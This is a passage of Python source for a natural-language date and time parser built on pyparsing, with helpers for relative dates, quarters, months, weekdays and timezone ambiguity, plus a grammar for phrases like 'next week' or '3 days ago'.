datetime.datetime.utcnow().replace(microsecond=0)\n\n\ndef utc_today():\n return datetime.datetime.utcnow().date()\n\n\ndef past_future_wrap(func):\n def decorated_func(tokens, origin=None):\n if origin is None:\n origin = utc_today()\n if 'weekday_ref' in tokens and 'dir_rel' not in tokens.weekday_ref:\n for i, tag in [(-1, 'past'), (1, 'future')]:\n toks = tokens.copy()\n toks.weekday_ref.dir_rel = i\n func(toks, origin=origin)\n tokens[tag] = {'date': toks['date']}\n if 'days_delta' in toks:\n tokens[tag]['days_delta'] = toks['days_delta']\n if 'tz_threshold' in toks:\n tokens[tag]['tz_threshold'] = toks['tz_threshold']\n else:\n func(tokens, origin=origin)\n\n return decorated_func\n\n\ndef past_future_unwrap(func):\n time_keys = ['past', 'future']\n\n def decorated_func(tokens):\n if 'past' in tokens:\n for time_key in 
time_keys:\n toks = dict(tokens[time_key])\n for key, val in tokens.items():\n if key not in time_keys:\n toks[key] = val\n func(toks)\n for key, val in toks.items():\n tokens[time_key][key] = val\n else:\n func(tokens)\n\n return decorated_func\n\n\ndef tz_decorate(key, rel_hour=0):\n def tz_decorator(func):\n def decorated_func(tokens, origin=None):\n if origin is None:\n origin = utc_today()\n datetime_utc = func(tokens, origin=origin)\n now = utc_now()\n diff_hour = (now.hour - rel_hour) % 24\n if diff_hour >= 12:\n datetime_alt = func(tokens, origin=origin + datetime.timedelta(days=1))\n else:\n datetime_alt = func(tokens, origin=origin - datetime.timedelta(days=1))\n if datetime_utc and datetime_alt:\n tokens[key] = datetime_utc\n if datetime_utc != datetime_alt:\n tokens['days_delta'] = (datetime_alt - datetime_utc).days\n if diff_hour >= 12:\n tokens['tz_threshold'] = 24 - diff_hour\n else:\n tokens['tz_threshold'] = -diff_hour - 1\n elif datetime_utc or datetime_alt:\n tokens[key] = datetime_utc or datetime_alt\n else:\n tokens['datetime_parsing_error'] = True\n return\n\n return decorated_func\n\n return tz_decorator\n\n\ndef _setup_start(tokens):\n start = None\n for start_type in ['exclusive_start', 'inclusive_start']:\n if start_type in tokens:\n if 'future' in tokens[start_type]:\n start = tokens[start_type]['future']['calculatedTime']\n else:\n start = tokens[start_type]['calculatedTime']\n if isinstance(start, TimeInterval):\n start = start.get_end()\n if start is None:\n tokens['datetime_parsing_error'] = True\n return None\n if isinstance(start, datetime.date) and start_type == 'exclusive_start':\n start += datetime.timedelta(days=1)\n break\n return start\n\n\ndef _setup_end(tokens):\n end = None\n for end_type in ['exclusive_end', 'inclusive_end']:\n if end_type in tokens:\n if 'future' in tokens[end_type]:\n end = tokens[end_type]['future']['calculatedTime']\n del tokens[end_type]\n else:\n end = tokens[end_type]['calculatedTime']\n if isinstance(end, TimeInterval):\n end = end.get_start()\n if end is None:\n tokens['datetime_parsing_error'] = True\n return None\n if isinstance(end, datetime.date) and end_type == 'exclusive_end':\n end -= datetime.timedelta(1)\n break\n return end\n\n\ndef before_after_any(tokens):\n start = _setup_start(tokens)\n end = _setup_end(tokens)\n if 'past' in tokens:\n del tokens['past']\n del tokens['future']\n if start and end:\n tokens['calculatedTime'] = TimeInterval(start, end)\n\n\ndef set_datetime(tokens):\n if 'past' in tokens:\n return {\n 'past': set_datetime_single(tokens['past']),\n 'future': set_datetime_single(tokens['future'])\n }\n return set_datetime_single(tokens)\n\n\ndef set_datetime_single(tokens):\n result = {}\n if tokens.get('datetime_parsing_error') or 'calculatedTime' not in tokens:\n return {'datetime_parsing_error': True}\n result['utc'] = tokens.get('utc', False)\n if 'days_delta' in tokens and 'tz_threshold' in tokens:\n result['days_delta'] = tokens['days_delta']\n result['tz_threshold'] = tokens['tz_threshold']\n if isinstance(tokens['calculatedTime'], datetime.datetime):\n result['datetime'] = tokens['calculatedTime'].isoformat(' ')\n elif isinstance(tokens['calculatedTime'], datetime.date):\n result['date'] = tokens['calculatedTime'].isoformat()\n elif isinstance(tokens['calculatedTime'], datetime.time):\n if utc_now().hour >= 12:\n result['days_delta'] = 1\n result['tz_threshold'] = 24 - utc_now().hour\n else:\n result['days_delta'] = -1\n result['tz_threshold'] = -utc_now().hour - 1\n result['datetime'] = 
datetime.datetime.combine(utc_today(),\n tokens['calculatedTime']).isoformat(' ')\n elif isinstance(tokens['calculatedTime'], TimeInterval):\n result['interval'] = {\n 'start': tokens['calculatedTime'].get_start().isoformat(),\n 'end': tokens['calculatedTime'].get_end().isoformat()\n }\n return result\n\n\ndef process_two_digits_year(tokens):\n two_digit_token = int(tokens[0])\n if two_digit_token > _CENTURY_CHANGE: # TODO: Will break after singularity!\n return 1900 + two_digit_token\n return 2000 + two_digit_token\n\n\ndef is_leap_year(y):\n return y % 4 == 0 and (y % 100 != 0 or y % 400 == 0)\n\n\ndef year_interval(year_num):\n return TimeInterval(datetime.date(year_num, 1, 1), datetime.date(year_num, 12, 31))\n\n\ndef quarter_by_date(origin=None):\n origin = origin or utc_today()\n if origin.month < 4:\n return 1\n if origin.month < 7:\n return 2\n if origin.month < 10:\n return 3\n return 4\n\n\ndef quarter_interval(quarter_num, year_num):\n q = {\n 1: TimeInterval(datetime.date(year_num, 1, 1), datetime.date(year_num, 3, 31)),\n 2: TimeInterval(datetime.date(year_num, 4, 1), datetime.date(year_num, 6, 30)),\n 3: TimeInterval(datetime.date(year_num, 7, 1), datetime.date(year_num, 9, 30)),\n 4: TimeInterval(datetime.date(year_num, 10, 1), datetime.date(year_num, 12, 31))\n }\n return q[quarter_num]\n\n\ndef month_days(month_num, year_num):\n return [None, 31, 29 if is_leap_year(year_num) else 28, 31, 30, 31, 30, 31, 31, 30, 31, 30,\n 31][month_num]\n\n\ndef month_interval(month_num, year_num):\n return TimeInterval(datetime.date(year_num, month_num, 1),\n datetime.date(year_num, month_num, month_days(month_num, year_num)))\n\n\ndef convert_to_timedelta(tokens):\n unit = tokens.time_unit.lower().rstrip('s')\n dir_tok = tokens.dir_abs * tokens.get('qty', 1)\n tokens['timeOffset'] = {\n 'year': relativedelta(years=dir_tok),\n 'month': relativedelta(months=dir_tok),\n 'week': datetime.timedelta(weeks=dir_tok),\n 'day': datetime.timedelta(days=dir_tok),\n 'hour': datetime.timedelta(hours=dir_tok),\n 'minute': datetime.timedelta(minutes=dir_tok),\n 'second': datetime.timedelta(seconds=dir_tok),\n }[unit]\n\n\n@past_future_wrap\n@tz_decorate('date')\ndef convert_to_day(tokens, origin=None):\n if 'weekday_ref' in tokens:\n today_num = origin.weekday()\n named_day_num = weekday_number_mapping(tokens.weekday_ref.day_name.lower())\n diff = named_day_num - today_num\n if tokens.weekday_ref.dir_rel >= 0:\n day_diff = diff if diff > 0 else diff + 7\n else:\n day_diff = diff if diff < 0 else diff - 7\n return origin + datetime.timedelta(days=day_diff)\n\n name = tokens.name.lower()\n return {\n 'today': origin,\n 'yesterday': origin + datetime.timedelta(days=-1),\n 'tomorrow': origin + datetime.timedelta(days=1),\n }[name]\n\n\n@tz_decorate('date')\ndef convert_to_date(tokens, origin=None):\n yy = int(tokens.year) if 'year' in tokens else origin.year\n mm = month_mapping(tokens.month) if 'month' in tokens else origin.month\n dd = day_number_mapping(tokens.day[0] if isinstance(tokens.day, list) else tokens.day)\n parsed_date = datetime.date(yy, mm, dd)\n if 'day_name' in tokens and parsed_date.weekday() != weekday_number_mapping(tokens['day_name']):\n return None\n return parsed_date\n\n\ndef convert_to_time(tokens):\n hh = int(tokens.get('hour', 0))\n mm = int(tokens.get('minute', 0))\n ss = int(tokens.get('second', 0))\n return datetime.time(hh, mm, ss)\n\n\ndef convert_to_interval(tokens):\n origin = utc_today()\n unit = tokens.time_unit.lower().rstrip('s')\n dir_tok = tokens.dir_rel\n if unit == 
'day':\n start = datetime.datetime.combine(origin, datetime.time(8))\n end = datetime.datetime.combine(origin, datetime.time(18))\n elif unit == 'week':\n weekday = origin.weekday()\n start = origin + datetime.timedelta(days=-weekday + 7 * dir_tok)\n end = origin + datetime.timedelta(days=6 - weekday + 7 * dir_tok)\n elif unit == 'month':\n rel_date = origin + relativedelta(months=dir_tok)\n start = datetime.date(rel_date.year, rel_date.month, 1)\n end = datetime.date(rel_date.year, rel_date.month, month_days(rel_date.month,\n rel_date.year))\n if 'day' in tokens:\n _day = day_number_mapping(tokens.day)\n if _day <= month_days(rel_date.month, rel_date.year):\n tokens['calculatedTime'] = datetime.date(rel_date.year, rel_date.month, _day)\n return\n elif unit == 'year':\n _year = origin.year + dir_tok\n if 'month' in tokens:\n _month = month_mapping(tokens.month)\n start = datetime.date(_year, _month, 1)\n end = datetime.date(_year, _month, month_days(_month, _year))\n else:\n start = datetime.date(_year, 1, 1)\n end = datetime.date(_year, 12, 31)\n else:\n return\n tokens['calculatedTime'] = TimeInterval(start, end)\n\n\n@past_future_unwrap\ndef convert_to_abs_time(tokens):\n day = tokens.get('named_day', tokens.get('date', None))\n if 'time_of_day' in tokens:\n if isinstance(tokens['time_of_day'], datetime.time):\n parsed_time = tokens['time_of_day']\n elif tokens['time_of_day'] in ['noon', 'midnight']:\n parsed_time = {\n 'noon': datetime.time(12),\n 'midnight': datetime.time(0),\n }[tokens['time_of_day']]\n elif 'hour' in tokens:\n parsed_time = convert_to_time(tokens)\n else:\n parsed_time = utc_now().time()\n else:\n parsed_time = None\n if parsed_time is not None and day is not None:\n tokens['abs_time'] = datetime.datetime.combine(day, parsed_time)\n elif parsed_time is not None:\n tokens['abs_time'] = parsed_time\n elif day is not None:\n tokens['abs_time'] = day\n\n\n@past_future_unwrap\ndef calculate_time(tokens):\n if 'abs_time' in tokens:\n abs_time = tokens['abs_time']\n elif tokens.time_unit in [hour_, minute_, _second_]:\n abs_time = utc_now()\n else:\n abs_time = utc_today()\n if 'timeOffset' in tokens:\n abs_time += tokens['timeOffset']\n tokens['calculatedTime'] = abs_time\n\n\ndef day_number_mapping(day_str):\n d = {\n '1st': 1,\n '2nd': 2,\n '3rd': 3,\n '4th': 4,\n '5th': 5,\n '6th': 6,\n '7th': 7,\n '8th': 8,\n '9th': 9,\n '10th': 10,\n '11th': 11,\n '12th': 12,\n '13th': 13,\n '14th': 14,\n '15th': 15,\n '16th': 16,\n '17th': 17,\n '18th': 18,\n '19th': 19,\n '20th': 20,\n '21st': 21,\n '22nd': 22,\n '23rd': 23,\n '24th': 24,\n '25th': 25,\n '26th': 26,\n '27th': 27,\n '28th': 28,\n '29th': 29,\n '30th': 30,\n '31st': 31\n }\n day_str = day_str.lower()\n if day_str in d:\n return d[day_str]\n return int(day_str)\n\n\ndef weekday_number_mapping(weekday_str):\n d = {\n 'monday': 0,\n 'mon': 0,\n 'mon.': 0,\n 'tuesday': 1,\n 'tue': 1,\n 'tue.': 1,\n 'tues': 1,\n 'tues.': 1,\n 'wednesday': 2,\n 'wed': 2,\n 'wed.': 2,\n 'thursday': 3,\n 'thu': 3,\n 'thu.': 3,\n 'thurs': 3,\n 'thurs.': 3,\n 'friday': 4,\n 'fri': 4,\n 'fri.': 4,\n 'saturday': 5,\n 'sat': 5,\n 'sat.': 5,\n 'sunday': 6,\n 'sun': 6,\n 'sun.': 6\n }\n return d[weekday_str.lower()]\n\n\ndef month_mapping(month_str):\n m = {\n '1': 1,\n '01': 1,\n 'jan': 1,\n 'jan.': 1,\n 'january': 1,\n '2': 2,\n '02': 2,\n 'feb': 2,\n 'feb.': 2,\n 'february': 2,\n '3': 3,\n '03': 3,\n 'mar': 3,\n 'mar.': 3,\n 'march': 3,\n '4': 4,\n '04': 4,\n 'apr': 4,\n 'apr.': 4,\n 'april': 4,\n '5': 5,\n '05': 5,\n 'may': 5,\n '6': 6,\n '06': 
6,\n 'jun': 6,\n 'jun.': 6,\n 'june': 6,\n '7': 7,\n '07': 7,\n 'jul': 7,\n 'jul.': 7,\n 'july': 7,\n '8': 8,\n '08': 8,\n 'aug': 8,\n 'aug.': 8,\n 'august': 8,\n '9': 9,\n '09': 9,\n 'sep': 9,\n 'sep.': 9,\n 'sept': 9,\n 'sept.': 9,\n 'september': 9,\n '10': 10,\n 'oct': 10,\n 'oct.': 10,\n 'october': 10,\n '11': 11,\n 'nov': 11,\n 'nov.': 11,\n 'november': 11,\n '12': 12,\n 'dec': 12,\n 'dec.': 12,\n 'december': 12\n }\n return m[month_str.lower()]\n\n\ndef quarter_mapping(quarter_parsed_expr):\n q = {\n 'q1': 1,\n 'q2': 2,\n 'q3': 3,\n 'q4': 4,\n 'first': 1,\n 'second': 2,\n 'third': 3,\n 'fourth': 4,\n }\n return q[str(quarter_parsed_expr).lower()]\n\n\ndef beginning_end_of_action(tokens):\n calc_time = utc_today()\n bound = {\n 'beginning': _BEGINNING,\n 'start': _BEGINNING,\n 'early': _BEGINNING,\n 'middle': _MIDDLE,\n 'mid': _MIDDLE,\n 'end': _END,\n 'late': _END,\n }[tokens.get('bound')]\n if 'calculatedTime' in tokens and isinstance(tokens['calculatedTime'], TimeInterval):\n if bound is _BEGINNING:\n calc_time = tokens['calculatedTime'].get_start()\n elif bound is _MIDDLE:\n delta = tokens['calculatedTime'].get_end() - tokens['calculatedTime'].get_start()\n calc_time = tokens['calculatedTime'].get_start() + delta // 2\n elif bound is _END:\n calc_time = tokens['calculatedTime'].get_end()\n elif 'name' in tokens:\n calc_time += {\n 'yesterday': datetime.timedelta(days=-1),\n 'today': datetime.timedelta(days=0),\n 'tomorrow': datetime.timedelta(days=1)\n }[tokens.name]\n tokens['calculatedTime'] = calc_time\n\n\ndef half_of_action(tokens):\n calc_time = utc_today()\n first = tokens['half'] in ['first', 'earlier']\n if 'calculatedTime' in tokens and isinstance(tokens['calculatedTime'], TimeInterval):\n if first:\n calc_time = tokens['calculatedTime'].get_first_half()\n else:\n calc_time = tokens['calculatedTime'].get_second_half()\n elif 'name' in tokens:\n calc_time += {\n 'yesterday': datetime.timedelta(days=-1),\n 'today': datetime.timedelta(days=0),\n 'tomorrow': datetime.timedelta(days=1)\n }[tokens.name]\n tokens['calculatedTime'] = calc_time\n\n\n@tz_decorate('calculatedTime', rel_hour=8)\ndef asap_action(_, origin=None):\n calc = datetime.datetime(origin.year, origin.month, origin.day) + datetime.timedelta(hours=8)\n return calc + (datetime.timedelta(days=1) if utc_now().hour >= 8 else datetime.timedelta(\n days=0))\n\n\ndef interval_year_action(tokens): # TODO: set an interval timezone decoration\n origin = utc_today()\n if 'dir_rel' in tokens:\n calc_time = year_interval(origin.year + tokens.dir_rel)\n elif 1900 < int(tokens.get('year', 0)) - _CENTURY_CHANGE <= 2000:\n calc_time = year_interval(int(tokens.year))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\ndef interval_quarter_action(tokens, origin=None): # TODO: set an interval timezone decoration\n if origin is None:\n origin = utc_today()\n if 'dir_rel' in tokens:\n rel_date = origin + relativedelta(months=3 * tokens.dir_rel)\n calc_time = quarter_interval(quarter_by_date(origin=rel_date), rel_date.year)\n elif 'quarter' in tokens:\n calc_time = quarter_interval(quarter_mapping(tokens.quarter),\n int(tokens.get('year', origin.year)))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\n# TODO: add last and next occurrence of the month when year is unclear\n# TODO: set an interval timezone decoration\ndef interval_month_action(tokens):\n origin = utc_today()\n if 'dir_rel' in tokens:\n rel_date = origin + relativedelta(months=tokens.dir_rel)\n calc_time = month_interval(rel_date.month, 
rel_date.year)\n elif 'month' in tokens:\n calc_time = month_interval(month_mapping(tokens.month), int(tokens.get('year',\n origin.year)))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\ndef now_action(tokens):\n now = utc_now()\n if 'time_unit' in tokens:\n unit = tokens.time_unit.lower().rstrip('s')\n delta = {\n 'hour': datetime.timedelta(hours=tokens.qty * tokens.dir_abs),\n 'minute': datetime.timedelta(minutes=tokens.qty * tokens.dir_abs),\n 'second': datetime.timedelta(seconds=tokens.qty * tokens.dir_abs),\n }[unit]\n else:\n delta = datetime.timedelta()\n tokens['utc'] = True\n tokens['calculatedTime'] = now + delta\n\n\n@tz_decorate('calculatedTime')\ndef named_day_action(tokens, origin=None):\n day = origin\n if 'date' in tokens:\n day = tokens.date\n if 'time_unit' in tokens:\n unit = tokens.time_unit.lower().rstrip('s')\n delta = {\n 'year': relativedelta(years=tokens.qty * tokens.dir_abs),\n 'month': relativedelta(months=tokens.qty * tokens.dir_abs),\n 'week': datetime.timedelta(weeks=tokens.qty * tokens.dir_abs),\n 'day': datetime.timedelta(days=tokens.qty * tokens.dir_abs),\n }[unit]\n else:\n delta = datetime.timedelta()\n if 'time_of_day' in tokens:\n if isinstance(tokens.time_of_day, datetime.time):\n parsed_time = tokens.time_of_day\n elif tokens.time_of_day in ['noon', 'midnight']:\n parsed_time = {\n 'noon': datetime.time(12),\n 'midnight': datetime.time(0),\n }[tokens.time_of_day]\n elif 'hour' in tokens:\n parsed_time = convert_to_time(tokens)\n else:\n parsed_time = utc_now().time()\n else:\n parsed_time = None\n if parsed_time is not None:\n if day is not None:\n return datetime.datetime.combine(day + delta, parsed_time)\n return parsed_time + delta\n return day + delta\n\n\n@tz_decorate('calculatedTime')\ndef last_this_next_action(tokens, origin=None):\n return datetime.datetime.combine(origin + datetime.timedelta(days=tokens[0]), tokens[1])\n\n\ndef am_pm_time_to_full(tokens):\n tokens['hour'] = int(tokens['hour']) % 12\n if 'pm' in tokens:\n tokens['hour'] += 12\n return tokens\n\n\ndef o_clock_time_to_full(tokens):\n tokens['hour'] = int(tokens['hour']) % 12\n if tokens['hour'] < 7: # Assumption: o'clock times between 7-18\n tokens['hour'] += 12\n return tokens\n\n\n# Grammar used to parse different times is defined below\n\nthe_ = utils.caseless_keyword('the')\nto_ = utils.caseless_keyword('to')\nto_dash_ = utils.caseless_keyword_or(['to', '-'])\nat_ = utils.caseless_keyword_or(['at', '@'])\nand_ = utils.caseless_keyword('and')\nby_ = utils.caseless_keyword('by')\naround_ = utils.caseless_keyword('around')\nof_ = utils.caseless_keyword('of')\non_ = utils.caseless_keyword('on')\nof_dash_ = utils.caseless_keyword_or(['of', '-'])\ntime_ = utils.caseless_keyword('time')\no_clock = utils.caseless_keyword_or(['o\\'clock', 'oclock', 'o clock'])\nbetween_ = utils.caseless_keyword('between')\n\nin_ = utils.caseless_keyword('in').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nfrom_ = utils.caseless_keyword('from').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nbefore_ = utils.caseless_keyword('before').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_abs')\nafter_ = utils.caseless_keyword('after').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nago_ = utils.caseless_keyword('ago').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_abs')\n\nnext_ = utils.caseless_keyword('next').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_rel')\nlast_ = 
utils.caseless_keyword('last').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_rel')\nthis_ = utils.caseless_keyword('this').setParseAction(\n pyparsing.replaceWith(0)).setResultsName('dir_rel')\n\nnoon_ = utils.caseless_keyword('noon')\nmidnight_ = utils.caseless_keyword('midnight')\nnow_ = utils.caseless_keyword('now')\n\ndawn = utils.caseless_keyword('dawn').setParseAction(lambda tokens: datetime.time(5))\nsunrise = utils.caseless_keyword('sunrise').setParseAction(lambda tokens: datetime.time(6))\nmorning = utils.caseless_keyword('morning').setParseAction(lambda tokens: datetime.time(9))\nAM = pyparsing.Regex(r'a(\\. ?)?m\\.?', re.IGNORECASE).setParseAction(lambda tokens: datetime.time(9))\nafternoon = utils.caseless_keyword('afternoon').setParseAction(lambda tokens: datetime.time(14))\nPM = pyparsing.Regex(r'p(\\. ?)?m\\.?',\n re.IGNORECASE).setParseAction(lambda tokens: datetime.time(14))\ndusk = utils.caseless_keyword('dusk').setParseAction(lambda tokens: datetime.time(17))\nsunset = utils.caseless_keyword('sunset').setParseAction(lambda tokens: datetime.time(18))\neod = utils.caseless_keyword('eod').setParseAction(lambda tokens: datetime.time(18))\nevening = utils.caseless_keyword('evening').setParseAction(lambda tokens: datetime.time(19))\nnight = utils.caseless_keyword('night').setParseAction(lambda tokens: datetime.time(21))\ntonight = (pyparsing.Empty().setParseAction(pyparsing.replaceWith(0)) +\n utils.caseless_keyword('tonight').setParseAction(lambda tokens: datetime.time(21)))\n\nyear_ = utils.pluralize('year', pyparsing_regex=True)\nquarter_ = utils.pluralize('quarter', pyparsing_regex=True)\nmonth_ = utils.pluralize('month', pyparsing_regex=True)\nweek_ = utils.pluralize('week', pyparsing_regex=True)\nday_ = utils.pluralize('day', pyparsing_regex=True)\nhour_ = utils.pluralize('hour', pyparsing_regex=True)\nminute_ = utils.pluralize('minute', pyparsing_regex=True)\n_second_ = utils.pluralize('second', pyparsing_regex=True)\n\n# TODO: Use some NLP tool to disambiguate some months (e.g. `may` verb or noun)\n# if this causes any issues\nmonths = pyparsing.Regex(\n r'\\b('\n r'jan(uary|\\.)?'\n r'|feb(ruary|\\.)?'\n r'|mar(ch|\\.)?'\n r'|apr(il|\\.)?'\n r'|may'\n r'|jun(e|\\.)?'\n r'|jul(y|\\.)?'\n r'|aug(ust|\\.)?'\n r'|sep(t(ember|\\.)?|\\.)?'\n r'|oct(ober|\\.)?'\n r'|nov(ember|\\.)?'\n r'|dec(ember|\\.)?'\n r')\\b', re.IGNORECASE)\n\n# TODO: Use some NLP tool to disambiguate some months (e.g. 
`may` verb or noun)\n# if this causes any issues\nmonths_no_spaces = pyparsing.Regex(\n r'('\n r'jan(uary|\\.)?'\n r'|feb(ruary|\\.)?'\n r'|mar(ch|\\.)?'\n r'|apr(il|\\.)?'\n r'|may'\n r'|jun(e|\\.)?'\n r'|jul(y|\\.)?'\n r'|aug(ust|\\.)?'\n r'|sep(t(ember|\\.)?|\\.)?'\n r'|oct(ober|\\.)?'\n r'|nov(ember|\\.)?'\n r'|dec(ember|\\.)?'\n r')\\b', re.IGNORECASE)\n\nday_name = pyparsing.Regex(\n r'\\b('\n r'mon(day|\\.)?'\n r'|tue(s(day|\\.)?|\\.)?'\n r'|wed(nesday|\\.)?'\n r'|thu(rs(day|\\.)?|\\.)?'\n r'|fri(day|\\.)?'\n r'|sat(urday|\\.)?'\n r'|sun(day|\\.)?'\n r')\\b', re.IGNORECASE)\nday_name = day_name.setResultsName('day_name')\n\nordinal_day = pyparsing.Regex(r'\\b('\n r'[23]0th'\n r'|[23]?(1st|2nd|3rd|[4-9]th)'\n r'|1\\dth'\n r')\\b', re.IGNORECASE)\n\ndate_separators = ['/', '-', '.']\n\ncouple = (Optional(utils.caseless_keyword('a')) + utils.caseless_keyword('couple') + Optional(of_))\ncouple.setParseAction(pyparsing.replaceWith(2))\n\na_qty = pyparsing.Regex(r'\\ban?\\b', re.IGNORECASE).setParseAction(pyparsing.replaceWith(1))\n\ninteger = pyparsing.Word(pyparsing.nums).setParseAction(lambda token: int(token[0]))\ninteger_month = pyparsing.Regex(r'\\b(1[012]|0?[1-9])\\b')\ninteger_day = pyparsing.Regex(r'\\b(3[01]|[1-2]\\d|0?[1-9])\\b')\ninteger_month_two_digits_no_trailing_space = pyparsing.Regex(r'\\b(1[012]|0[1-9])')\ninteger_day_no_trailing_space = pyparsing.Regex(r'\\b(3[01]|[1-2]\\d|0?[1-9])')\ninteger_day_two_digits_no_leading_space = pyparsing.Regex(r'(3[01]|[1-2]\\d|0[1-9])\\b')\n\nqty = integer | couple | a_qty | units\nqty = qty.setResultsName('qty')\n\nyear4 = pyparsing.Regex(r'\\b\\d{4}\\b').setResultsName('year')\nyear2 = pyparsing.Regex(r'\\b\\d{2}\\b').setParseAction(process_two_digits_year).setResultsName('year')\nyear = pyparsing.MatchFirst([year4, year2])\n\ndate_sep = Optional(pyparsing.Regex(r'[/\\-\\. ]'))\nyear_sep = Optional(pyparsing.Regex(r'[/\\-\\. 
,]'))\n\nmonth = pyparsing.MatchFirst([integer_month, months])\nmonth = month.setResultsName('month')\n\nday_spec = pyparsing.MatchFirst([integer_day, ordinal_day])\nday_spec = day_spec.setResultsName('day')\n\ndate_day = pyparsing.MatchFirst([day_name + Optional(the_),\n the_]) \\\n + ordinal_day('day')\n\ndate_ymd = year4\\\n + pyparsing.MatchFirst([SEP_SYM + month + SEP_SYM for SEP_SYM in date_separators])\\\n + day_spec\n\ndate_mdy = pyparsing.MatchFirst([\n month + date_sep + Optional(the_) + day_spec +\n Optional(year_sep + year + pyparsing.NotAny(':')),\n integer_month_two_digits_no_trailing_space('month') +\n integer_day_two_digits_no_leading_space('day')\n])\n\nignore_date_ydm = year4 + pyparsing.MatchFirst(\n [SEP_SYM + day_spec + SEP_SYM for SEP_SYM in date_separators]) + month\n\ndate_day_month = pyparsing.MatchFirst([\n day_spec + Optional(of_dash_) + month,\n integer_day_no_trailing_space('day') + months_no_spaces('month')\n])\n\ndate = pyparsing.MatchFirst([\n Optional(day_name + Optional(',')) + pyparsing.MatchFirst([date_ymd, date_mdy, date_day_month]),\n date_day\n])\ndate.setParseAction(convert_to_date)\n\nnamed_day = utils.caseless_keyword_or(['yesterday', 'today', 'tomorrow']).setResultsName('name')\n\nweekday_ref = Optional(Optional(this_).suppress() + last_ | this_ | next_)('dir_rel') + day_name\nweekday_ref = weekday_ref.setResultsName('weekday_ref')\n\nday_ref = named_day | weekday_ref\nday_ref.setParseAction(convert_to_day)\n\npart_of_day = pyparsing.MatchFirst(\n [morning, dawn, sunrise, AM, afternoon, PM, dusk, sunset, evening, eod, night])\npart_of_day = part_of_day.setResultsName('part_of_day')\n\nfull_hours = pyparsing.Regex(r'\\b(2[0-3]|(1|0?)[0-9])').setResultsName('hour')\nam_pm_hours = pyparsing.Regex(r'\\b(1[0-2]|0?[1-9])').setResultsName('hour')\nminutes = pyparsing.Regex(r'[0-5][0-9]').setResultsName('minute')\nseconds = pyparsing.Regex(r'[0-5][0-9]').setResultsName('second')\n\nam = pyparsing.Regex(r'a(\\. ?)?m\\.?\\b', re.IGNORECASE).setResultsName('am')\npm = pyparsing.Regex(r'p(\\. 
?)?m\\.?\\b', re.IGNORECASE).setResultsName('pm')\n\ntimezone = utils.caseless_keyword_or([\n 'Eastern', 'Central', 'Mountain', 'Pacific', 'EST', 'CST', 'MST', 'PST', 'EDT', 'CDT', 'MDT',\n 'PDT', 'ET', 'CT', 'MT', 'PT'\n])\n\nfull_time = full_hours + ':' + minutes + Optional(':' + seconds)\nam_pm_time = am_pm_hours + Optional(':' + minutes + Optional(':' + seconds)) + pyparsing.MatchFirst(\n [am, pm])\nam_pm_time.setParseAction(am_pm_time_to_full)\no_clock_time = am_pm_hours + o_clock\no_clock_time.setParseAction(o_clock_time_to_full)\n\nhms_time = Optional(at_) + pyparsing.MatchFirst([o_clock_time, am_pm_time, full_time\n ]) + Optional(timezone)\n\nthis_time = (this_ + time_).setResultsName('this_time')\n\ntime_of_day = pyparsing.MatchFirst([\n Optional(at_ | around_).suppress() + pyparsing.MatchFirst(\n [this_time, hms_time, noon_, midnight_, dusk, dawn, sunrise, sunset, night]),\n Optional(Optional(in_) + the_).suppress() +\n pyparsing.MatchFirst([morning, afternoon, evening, night]),\n Optional(by_).suppress() + eod\n])\ntime_of_day = time_of_day.setResultsName('time_of_day')\n\nrelative_date_unit = (year_ | month_ | week_ | day_)('time_unit')\nrelative_time_unit = (hour_ | minute_ | _second_)('time_unit')\nrelative_datetime_unit = (relative_date_unit | relative_time_unit)\n\nnow_datetime_spec = pyparsing.MatchFirst([\n now_,\n Optional(in_) + qty + relative_time_unit + from_ + now_,\n qty + relative_time_unit + (ago_ | before_ + now_),\n in_ + qty + relative_time_unit,\n])\nnow_datetime_spec.setParseAction(now_action)\n\nnamed_day_date_spec = pyparsing.MatchFirst([\n Optional(in_) + qty + relative_date_unit + from_ + now_,\n qty + relative_date_unit + (ago_ | before_ + now_),\n in_ + qty + relative_date_unit + Optional(time_of_day),\n])\nnamed_day_date_spec.setParseAction(named_day_action)\n\nlast_this_next_interval = pyparsing.MatchFirst([\n Optional(Optional(the_) + day_spec('day') + of_) + (last_ | this_ | next_) +\n (week_ | month_)('time_unit'),\n Optional(months('month')) + (last_ | this_ | next_) + year_('time_unit')\n])\nlast_this_next_interval.setParseAction(convert_to_interval)\nlast_this_next_interval = last_this_next_interval.setResultsName('calculatedTime')\n\ndatetime_spec = Optional(last_this_next_interval) \\\n + pyparsing.MatchFirst([\n time_of_day + Optional(Optional(of_ | on_) + (date | day_ref)),\n (date | day_ref) + Optional(Optional(',') + time_of_day)\n ])\ndatetime_spec.setParseAction(convert_to_abs_time, calculate_time)\n\nrel_time_spec = Optional(in_) + qty + relative_datetime_unit + (from_ | before_\n | after_) + datetime_spec\nrel_time_spec.setParseAction(convert_to_timedelta, calculate_time)\n\nlast_this_next_part_of_day = pyparsing.MatchFirst([\n tonight,\n (last_ | this_ | next_) + part_of_day,\n])\nlast_this_next_part_of_day.setParseAction(last_this_next_action)\n\ninterval_year = year('year')\ninterval_year.setParseAction(interval_year_action)\n\ninterval_year4 = Optional('$')('datetime_parsing_error') + year4('year')\ninterval_year4.setParseAction(interval_year_action)\n\nquarter_name = pyparsing.Regex(r'\\bQ[1234]\\b', re.IGNORECASE)\ninterval_quarter = pyparsing.MatchFirst([\n pyparsing.MatchFirst([\n quarter_name('quarter'),\n utils.caseless_keyword_or(['first', 'second', 'third', 'fourth'])('quarter') + quarter_\n ]) + Optional(year),\n (last_ | this_ | next_)('dir_rel') + quarter_,\n])\ninterval_quarter.setParseAction(interval_quarter_action)\n\ninterval_month = months('month') + Optional(Optional(',') + 
